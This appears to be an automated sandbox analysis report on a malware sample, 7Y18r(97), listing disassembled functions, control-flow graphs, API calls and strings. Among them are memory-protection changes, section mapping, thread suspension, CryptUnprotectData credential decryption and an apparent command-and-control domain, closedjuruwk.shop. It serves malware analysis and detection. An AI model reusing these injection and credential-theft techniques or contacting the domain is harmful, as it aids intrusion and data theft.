                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 025BFB57
                  • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 025BFC0C
                  • VirtualProtect.KERNELBASE(?,?,00000008,?,?,?,?,?,?,?), ref: 025BFC29
                  • VirtualProtect.KERNELBASE(?,?,?,00000000), ref: 025BFCCC
                  • VirtualProtect.KERNELBASE(?,?,00000002,?,?,?,?,?,?,?), ref: 025BFCFF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$ProtectSection$View$AllocCreate
                  • String ID:
                  • API String ID: 2664363762-0
                  • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                  • Instruction ID: ecf61c558f1cf71c4aef94cd9f4984a6b432ba4d4a2217cc396d8e99178d8b40
                  • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                  • Instruction Fuzzy Hash: FD427871608301AFDB25CF24CC44BAABBE9FF88714F14492DF9859B691E770E940CB95
                  Function 02AC7DEB Relevance: 7.8, Strings: 6, Instructions: 325COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 598 2ac7deb-2ac7e2a 599 2ac7e2c-2ac7e2f 598->599 600 2ac7e76-2ac7ee7 call 2ac6840 598->600 601 2ac7e30-2ac7e74 599->601 604 2ac7ee9 600->604 605 2ac7f33-2ac7fc9 call 2ac6840 600->605 601->600 601->601 607 2ac7ef0-2ac7f31 604->607 609 2ac8019-2ac808b call 2ac6840 605->609 610 2ac7fcb 605->610 607->605 607->607 614 2ac80dc-2ac8160 call 2ac6840 609->614 615 2ac808d-2ac808f 609->615 611 2ac7fd0-2ac8017 610->611 611->609 611->611 619 2ac81d6-2ac820b 614->619 620 2ac8162 614->620 616 2ac8090-2ac80da 615->616 616->614 616->616 621 2ac8210-2ac8219 619->621 622 2ac8170-2ac81d4 620->622 621->621 623 2ac821b-2ac821e 621->623 622->619 622->622 624 2ac8224-2ac8229 623->624 625 2ac8ae5 623->625 626 2ac8ae8-2ac8af9 call 2ab93a0 624->626 625->626 629 2ac8afb-2ac8afe 626->629 630 2ac8b11-2ac8b24 626->630 631 2ac8b00-2ac8b0f 629->631 632 2ac8b26-2ac8b2f 630->632 633 2ac8b43 630->633 631->630 631->631 634 2ac8b30-2ac8b3f 632->634 635 2ac8b46-2ac8b7b call 2ae3fb0 call 2ac6840 633->635 634->634 636 2ac8b41 634->636 641 2ac8b80-2ac8b83 635->641 636->635
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: -j/$3Y=[$BE$S=W?$f%G'$QS
                  • API String ID: 0-522869440
                  • Opcode ID: b63693fef9c64414d3833b9ca3019ee4609e921b52a58dac54f106847b6ef913
                  • Instruction ID: e54950cc5175270a466b984d8edd1613751d5367cc86cfd56e1f375dde03dca7
                  • Opcode Fuzzy Hash: b63693fef9c64414d3833b9ca3019ee4609e921b52a58dac54f106847b6ef913
                  • Instruction Fuzzy Hash: 92D124B19187809FD324CF24C49065BBBF2BF89318F249A1DF9D99B251DB34D9068F86
                  Function 02570DBD Relevance: 7.6, APIs: 5, Instructions: 100threadprocessCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 642 2570dbd-2570e04 CreateToolhelp32Snapshot 645 2570eda-2570edd 642->645 646 2570e0a-2570e2b Thread32First 642->646 647 2570ec6-2570ed8 FindCloseChangeNotification 646->647 648 2570e31-2570e37 646->648 647->645 649 2570ea6-2570ec0 648->649 650 2570e39-2570e3f 648->650 649->647 649->648 650->649 651 2570e41-2570e60 650->651 651->649 654 2570e62-2570e66 651->654 655 2570e7e-2570e8d 654->655 656 2570e68-2570e7c Wow64SuspendThread 654->656 657 2570e92-2570ea4 FindCloseChangeNotification 655->657 656->657 657->649
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,02570903,?,00000001,?,81EC8B55,000000FF), ref: 02570DFB
                  • Thread32First.KERNEL32(00000000,0000001C), ref: 02570E27
                  • Wow64SuspendThread.KERNEL32(00000000), ref: 02570E7A
                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02570EA4
                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02570ED8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID: ChangeCloseFindNotification$CreateFirstSnapshotSuspendThreadThread32Toolhelp32Wow64
                  • String ID:
                  • API String ID: 1145194703-0
                  • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                  • Instruction ID: b298bc369e7475acde0b9ffe25c6fb62c9102967ae58dee586ef06b253c4e609
                  • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                  • Instruction Fuzzy Hash: 2A41E971A00108AFDB18DE98C590BAEBBF6EF88300F108168EA159B794DB34AE45CB54
                  Function 025706AD Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 399threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 658 25706ad-2570815 call 2570c5d call 257125d call 257140d call 2570ffd 667 2570c46-2570c49 658->667 668 257081b-2570822 658->668 669 257082d-2570831 668->669 670 2570853-25708ce GetPEB 669->670 671 2570833-2570851 call 257117d 669->671 672 25708d9-25708dd 670->672 671->669 674 25708f5-2570907 call 2570dbd 672->674 675 25708df-25708f3 672->675 681 2570931-2570952 CreateThread 674->681 682 2570909-257092f 674->682 675->672 683 2570955-2570959 681->683 682->683 685 257095f-2570992 call 25712bd 683->685 686 2570c1a-2570c3d 683->686 685->686 690 2570998-25709e7 685->690 686->667 692 25709f2-25709f8 690->692 693 2570a40-2570a44 692->693 694 25709fa-2570a00 692->694 697 2570b12-2570c05 call 2570dbd call 2570c5d call 257125d 693->697 698 2570a4a-2570a57 693->698 695 2570a13-2570a17 694->695 696 2570a02-2570a11 694->696 699 2570a3e 695->699 700 2570a19-2570a27 695->700 696->695 724 2570c07 697->724 725 2570c0a-2570c14 697->725 701 2570a62-2570a68 698->701 699->692 700->699 702 2570a29-2570a3b 700->702 705 2570a6a-2570a78 701->705 706 2570a98-2570a9b 701->706 702->699 707 2570a96 705->707 708 2570a7a-2570a89 705->708 709 2570a9e-2570aa5 706->709 707->701 708->707 711 2570a8b-2570a94 708->711 709->697 713 2570aa7-2570ab0 709->713 711->706 713->697 716 2570ab2-2570ac2 713->716 718 2570acd-2570ad9 716->718 720 2570adb-2570b08 718->720 721 2570b0a-2570b10 718->721 720->718 721->709 724->725 725->686
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 02570950
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID: wv+$;@u$R/)
                  • API String ID: 2422867632-4201909522
                  • Opcode ID: 6124027a3d22c3ab52a35a54154049c850b210035cdb7ffd0f039ad603429680
                  • Instruction ID: a0865ca49bf1ea0389c63003663347e381a5545461aaf1061146d9717a74e54b
                  • Opcode Fuzzy Hash: 6124027a3d22c3ab52a35a54154049c850b210035cdb7ffd0f039ad603429680
                  • Instruction Fuzzy Hash: 1312D0B0E00219DFDB14CF98D990BADBBB2FF88304F2482A9D515AB385D734AA45CF54
                  Function 02AB52E0 Relevance: 4.2, Strings: 3, Instructions: 431COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: )$IEND$VUUU
                  • API String ID: 0-801940756
                  • Opcode ID: 7cb97ba57918cab4b7bfe212e3176a6f6fc91869b8eca552ad980ff7e17598bb
                  • Instruction ID: 5cff4e87b3a77c4451b3845853810bc308ae5f6bf869538b0db97b4c69ee0169
                  • Opcode Fuzzy Hash: 7cb97ba57918cab4b7bfe212e3176a6f6fc91869b8eca552ad980ff7e17598bb
                  • Instruction Fuzzy Hash: 16E1D171A083449FD715CF18C88079BBBE9AF84304F44892DF9999B382DB75E905CB82
                  Function 02ABFCB0 Relevance: 4.0, Strings: 3, Instructions: 288COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: closedjuruwk.shop$pedc$tu
                  • API String ID: 0-278266355
                  • Opcode ID: e0061f30d8a6d7ca7b2d88bc27801632382053b64af2cd9da6e50c391a297d42
                  • Instruction ID: 910922d2fef2a95cc20edfc9dbde3655919a53e1b0b0f90cf6a9efe708acb558
                  • Opcode Fuzzy Hash: e0061f30d8a6d7ca7b2d88bc27801632382053b64af2cd9da6e50c391a297d42
                  • Instruction Fuzzy Hash: 09B165B00093C18FD3B1CF15C484B9BBBE5AFC6304F589A5CE4D82B252CB316949CBA6
                  Function 02570C6D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 02570D39
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID: ,
                  • API String ID: 2422867632-3772416878
                  • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                  • Instruction ID: 5fa03952a762b90c66acaf1a11c83763d1636032d1e76d1d84237b707eacce67
                  • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                  • Instruction Fuzzy Hash: 0541C474A40209EFDB14CF98D994BAEBBB1FF88314F208598D5156B394C771AE81CF98
                  Function 02AE7E80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45memoryCOMMON
                  Download Yara Rule
                  APIs
                  • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 02AE7F04
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID: f543
                  • API String ID: 1279760036-424919641
                  • Opcode ID: fab13b7a132e04d2b266c262c7f593ed3314804d3e062b445dfcd68963a019fd
                  • Instruction ID: f0aaaa54ceddee83b06720e712b353ff06d859e335c7de7e09e0fd4c659fb2cc
                  • Opcode Fuzzy Hash: fab13b7a132e04d2b266c262c7f593ed3314804d3e062b445dfcd68963a019fd
                  • Instruction Fuzzy Hash: B601A9305083409BC708EF18C8A0B2AFBF5EF86318F108A1CE9DA07690C731AD25CB86
                  Function 02AE9D10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LdrInitializeThunk.NTDLL(02AEC53C,?,00000006,00120089,?,00000018,onih,?,02AC699C), ref: 02AE9D36
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: onih
                  • API String ID: 2994545307-4145997799
                  • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                  • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                  • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                  • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
                  Function 02AC91C0 Relevance: 1.7, Strings: 1, Instructions: 421COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: 21
                  • API String ID: 0-4252452532
                  • Opcode ID: 4e17038c44f0cdecae78efd2eab1bce38e8333a05a2d6bf34a9ea0756de127a2
                  • Instruction ID: 9164cc57e8bb70bd3acfe5a9b66f3114e3a28c456e3c9a431be2bdc262767888
                  • Opcode Fuzzy Hash: 4e17038c44f0cdecae78efd2eab1bce38e8333a05a2d6bf34a9ea0756de127a2
                  • Instruction Fuzzy Hash: C4C1A9B15083128BC718CF18C89176BB7F1FF86358F188A1CE8965B391EBB4D905CB92
                  Function 02AC7A10 Relevance: 1.7, APIs: 1, Instructions: 154encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 02AC7BCD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: CryptDataUnprotect
                  • String ID:
                  • API String ID: 834300711-0
                  • Opcode ID: eb407574049fdfcb62ed8714d5b71a4b7c385d8469de7015bfa20711ce2fa21c
                  • Instruction ID: 221b28d1ef048f7df17c94b27c96d0a57a52036e7a1bcde4adb7b486b5e9e00c
                  • Opcode Fuzzy Hash: eb407574049fdfcb62ed8714d5b71a4b7c385d8469de7015bfa20711ce2fa21c
                  • Instruction Fuzzy Hash: 1651E5B19083819FC710CF68C88166BFBE6AF95314F294A5DE0E987392EB75D905CF42
                  Function 02AD2290 Relevance: 1.6, Strings: 1, Instructions: 354COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: /.)(
                  • API String ID: 2994545307-2587180175
                  • Opcode ID: 162853a3235a0342638e5f842537a84d4afae337bf04545bf522f44cbb3ed91a
                  • Instruction ID: 7f4825ffb1f8c53e9eab38e0220251c43a4b90ae5d8dc7468a0e991a704a775d
                  • Opcode Fuzzy Hash: 162853a3235a0342638e5f842537a84d4afae337bf04545bf522f44cbb3ed91a
                  • Instruction Fuzzy Hash: 08C1D5B5A083018FD715DF18C490B6BB7E1EF94318F14496DE9C687392EB39D845CB92
                  Function 02AECD40 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID: onih
                  • API String ID: 0-4145997799
                  • Opcode ID: 5796e6a06715c4ba5b887db1c61afeba090f5cf358ab7bd56b799d59135d3417
                  • Instruction ID: 3f850afcb19d324542151c3b7535a03ceb4ce13af52b4ca0bd3fe225b0467502
                  • Opcode Fuzzy Hash: 5796e6a06715c4ba5b887db1c61afeba090f5cf358ab7bd56b799d59135d3417
                  • Instruction Fuzzy Hash: D281B172A043119FCB14DF18C890B6FB7E2EF88724F15891DE59697251DB35EC12CB92
                  Function 02AB3260 Relevance: .2, Instructions: 170COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9517926dc5c14ac6f6dce1e3b994637ff39cda768fd5a93fe61ee4d13d66c5f4
                  • Instruction ID: 4c312ebf5bf5bcfd445c45659d1791d2d68e495064ca779807115d1f1313aeb3
                  • Opcode Fuzzy Hash: 9517926dc5c14ac6f6dce1e3b994637ff39cda768fd5a93fe61ee4d13d66c5f4
                  • Instruction Fuzzy Hash: 2751B1B0804701EFD7019F2AE84975BBBA4FF80318F044978E54A92A51DB39E975CB96
                  Function 02AC6EF8 Relevance: .1, Instructions: 63COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 450b968015e0eeb746d541a84f967f36d283bf82d9d506265fbf41f1d5e26588
                  • Instruction ID: 8ebc25a394a3e6f0cecb2fcd0f1e91fee438835c3fdc75590c46ae47ae959dd4
                  • Opcode Fuzzy Hash: 450b968015e0eeb746d541a84f967f36d283bf82d9d506265fbf41f1d5e26588
                  • Instruction Fuzzy Hash: BD214D716483818FDB18DF00D4A062FB3A6FBC9708F254E5DE19617685CB39D406CB56
                  Function 02AE3FC4 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8d6a9ef1210653eb34a946cdf28b2b6e50a39084c0ebdac5fa6a51706be7bc9d
                  • Instruction ID: 91f8d96adf870cb00675cf355383b7b13558a7e6034c9b73700258c8033a99e0
                  • Opcode Fuzzy Hash: 8d6a9ef1210653eb34a946cdf28b2b6e50a39084c0ebdac5fa6a51706be7bc9d
                  • Instruction Fuzzy Hash: 5CF081F1A40700BFD7609E28CC02B267EAAE749310F008255F899973C0D771E9158BA6
                  Function 02ABAB80 Relevance: 49.8, APIs: 1, Strings: 27, Instructions: 811libraryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 70 2abab80-2abac97 call 2abfca0 74 2abac99 70->74 75 2abace3-2abad21 LoadLibraryExW call 2ae9300 70->75 76 2abac9b-2abacdf 74->76 81 2abad23-2abad30 75->81 82 2abad35-2abaed9 call 2aeb840 * 12 75->82 76->76 78 2abace1 76->78 78->75 85 2abb6d4-2abb6e3 81->85 109 2abaedb-2abaee4 82->109 110 2abaef2-2abaf32 call 2ae42d0 109->110 111 2abaee6-2abaeed 109->111 117 2abaf34-2abaf3e 110->117 112 2abb043-2abb04d 111->112 112->85 118 2abb053-2abb258 112->118 117->117 119 2abaf40-2abaf58 117->119 128 2abb25a 118->128 129 2abb2ae-2abb2c6 call 2abc270 118->129 120 2abaf5a-2abaf60 119->120 121 2abaf62-2abaf65 119->121 122 2abafc1-2abafd2 call 2abb6f0 120->122 123 2abaf67-2abaf6a 121->123 132 2abafd7-2abafdc 122->132 125 2abaf6c-2abaf6f 123->125 126 2abaf71-2abafbf call 2abfb10 123->126 125->122 126->122 126->123 133 2abb25c-2abb2a1 128->133 139 2abb2c8 129->139 140 2abb2cd-2abb387 129->140 137 2abafde-2abb016 132->137 138 2abafe0-2abb00d call 2abc230 132->138 133->133 134 2abb2a3-2abb2ac 133->134 134->129 143 2abb018-2abb020 137->143 138->143 144 2abb6c9-2abb6cd 139->144 145 2abb389 140->145 146 2abb3cd-2abb3e9 call 2abc8e0 140->146 152 2abb02b-2abb02f 143->152 153 2abb022-2abb029 143->153 144->85 149 2abb38b-2abb3c9 145->149 159 2abb688-2abb6a3 call 2ae7f10 146->159 160 2abb3ef-2abb430 146->160 149->149 154 2abb3cb 149->154 157 2abb041 152->157 158 2abb031-2abb03c 152->158 153->152 154->146 157->112 158->109 175 2abb6a7-2abb6b4 159->175 176 2abb6a5-2abb6b6 159->176 163 2abb48a-2abb4b5 call 2abc8e0 160->163 164 2abb432 160->164 173 2abb4bc-2abb4f2 call 2abc930 163->173 174 2abb4b7 163->174 167 2abb434-2abb483 164->167 167->167 170 2abb485-2abb488 167->170 170->163 184 2abb4f5-2abb501 173->184 177 2abb686 174->177 181 2abb6bd-2abb6c5 175->181 176->181 177->159 181->85 185 2abb6c7 181->185 186 2abb503-2abb5ac 184->186 187 2abb511-2abb52f 184->187 185->144 195 2abb5ae-2abb5b8 186->195 189 2abb56f-2abb571 187->189 190 2abb531-2abb53b 187->190 191 2abb574-2abb597 189->191 190->189 196 2abb53d-2abb56d 190->196 191->184 195->195 198 2abb5ba-2abb5d4 195->198 196->191 200 2abb642-2abb65d call 2abb6f0 198->200 201 2abb5d6-2abb5df 198->201 207 2abb65f 200->207 208 2abb661-2abb67f call 2abc230 200->208 202 2abb5e1-2abb5e7 201->202 204 2abb5e9-2abb5eb 202->204 205 2abb5ed-2abb640 call 2abfb10 202->205 204->200 205->200 205->202 210 2abb682-2abb684 207->210 208->210 210->177
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: !$#$%$'$)$+$,$-$/$1$3$5$7$9$;$=$?$C$E$closedjuruwk.shop$q$s$u$w$y${$}
                  • API String ID: 1029625771-4036037855
                  • Opcode ID: ab9351f89dfd02510faec48d9043eba0804ced66ebf00172daf3c7c52199dd1e
                  • Instruction ID: 4945dbaf47cba0e1ea8325e6b3bf1d9dcd8796363149abf3027b97b994d08035
                  • Opcode Fuzzy Hash: ab9351f89dfd02510faec48d9043eba0804ced66ebf00172daf3c7c52199dd1e
                  • Instruction Fuzzy Hash: 92825A70508B80CED722DF38C884756BFE1AF16318F084A9DD8EA8B797D775A405CB62
                  Function 02ADA3F6 Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 77memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 243 2ada3f6-2ada4d5 244 2ada51f-2ada587 SysAllocString 243->244 245 2ada4d7 243->245 248 2ada591-2ada5ae 244->248 246 2ada4d9-2ada51b 245->246 246->246 247 2ada51d 246->247 247->244
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID: B$D$H$I$K$P$e$i$k$z
                  • API String ID: 2525500382-4014294549
                  • Opcode ID: 0bfebd074fe9c8715ac5e3a659ee9913cd01534408fb12475c22804d70e1e6f1
                  • Instruction ID: 57b6636a8eb01ad7ba556a18b2a3ec47c355de2b4cdd2057620750b093e0e92e
                  • Opcode Fuzzy Hash: 0bfebd074fe9c8715ac5e3a659ee9913cd01534408fb12475c22804d70e1e6f1
                  • Instruction Fuzzy Hash: C141B67015C7C28ED331CB288458B9BBFE1AB96318F044AADE5E98B292C7759405CB53
                  Function 02AD7EA9 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 403COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 446 2ad7ea9-2ad7f25 call 2aeb840 450 2ad7f89-2ad7f92 446->450 451 2ad7f27 446->451 452 2ad7fab-2ad7fb7 450->452 453 2ad7f94-2ad7f9a 450->453 454 2ad7f30-2ad7f87 451->454 456 2ad7fb9-2ad7fbf 452->456 457 2ad7fcb-2ad8057 FreeLibrary call 2aeb840 GetComputerNameExA 452->457 455 2ad7fa0-2ad7fa9 453->455 454->450 454->454 455->452 455->455 458 2ad7fc0-2ad7fc9 456->458 462 2ad8059 457->462 463 2ad80c4-2ad80cd 457->463 458->457 458->458 464 2ad8060-2ad80c2 462->464 465 2ad80ed-2ad80f3 463->465 466 2ad80cf-2ad80df 463->466 464->463 464->464 467 2ad80f6-2ad8102 465->467 468 2ad80e0-2ad80e9 466->468 469 2ad811b-2ad817d GetComputerNameExA 467->469 470 2ad8104-2ad810a 467->470 468->468 471 2ad80eb 468->471 473 2ad81cd-2ad81d6 469->473 474 2ad817f 469->474 472 2ad8110-2ad8119 470->472 471->467 472->469 472->472 476 2ad81d8-2ad81df 473->476 477 2ad81eb-2ad81f7 473->477 475 2ad8180-2ad81cb 474->475 475->473 475->475 478 2ad81e0-2ad81e9 476->478 479 2ad81f9-2ad81ff 477->479 480 2ad820b-2ad8286 477->480 478->477 478->478 481 2ad8200-2ad8209 479->481 483 2ad82df-2ad82e8 480->483 484 2ad8288 480->484 481->480 481->481 485 2ad82fb-2ad8307 483->485 486 2ad82ea 483->486 487 2ad8290-2ad82dd 484->487 489 2ad8309-2ad830f 485->489 490 2ad831b-2ad8396 call 2aeb840 485->490 488 2ad82f0-2ad82f9 486->488 487->483 487->487 488->485 488->488 491 2ad8310-2ad8319 489->491 495 2ad8398 490->495 496 2ad83e2-2ad83eb 490->496 491->490 491->491 497 2ad83a0-2ad83e0 495->497 498 2ad83ed-2ad83f3 496->498 499 2ad840b-2ad841b 496->499 497->496 497->497 501 2ad8400-2ad8409 498->501 500 2ad8439-2ad8445 499->500 502 2ad844b-2ad8452 500->502 503 2ad84e0-2ad84e3 500->503 501->499 501->501 504 2ad8454-2ad846f 502->504 505 2ad8420-2ad8425 502->505 506 2ad84e9-2ad8531 503->506 508 2ad8471-2ad8474 504->508 509 2ad84a0-2ad84a8 504->509 507 2ad842a-2ad8433 505->507 510 2ad8581-2ad858a 506->510 511 2ad8533 506->511 507->500 513 2ad84e5-2ad84e7 507->513 508->509 516 2ad8476-2ad8493 508->516 509->507 517 2ad84aa-2ad84db 509->517 514 2ad858c-2ad8592 510->514 515 2ad85ab-2ad85ae call 2add190 510->515 512 2ad8540-2ad857f 511->512 512->510 512->512 513->506 518 2ad85a0-2ad85a9 514->518 520 2ad85b3-2ad85ba 515->520 516->507 517->507 518->515 518->518
                  APIs
                  • FreeLibrary.KERNEL32(?), ref: 02AD7FD4
                  • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 02AD8011
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: ComputerFreeLibraryName
                  • String ID: ,"K$ido1$kvri
                  • API String ID: 2904949787-3663296290
                  • Opcode ID: 0c320a514e29b5516a9f207d8ff938f9fc3ba46a3a9e8455e18ebfe7ae1ba49a
                  • Instruction ID: 1ad1ae8809e1adb762ea9b5e58d6c7ba1062ed52f31166f2768f522ee69c0f26
                  • Opcode Fuzzy Hash: 0c320a514e29b5516a9f207d8ff938f9fc3ba46a3a9e8455e18ebfe7ae1ba49a
                  • Instruction Fuzzy Hash: 3FF16B70504F428ED325CF34C8947A3BBE1AF56309F444A5DD0EB8B292DB39A54ACFA0
                  Function 02ADFB2F Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 207COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
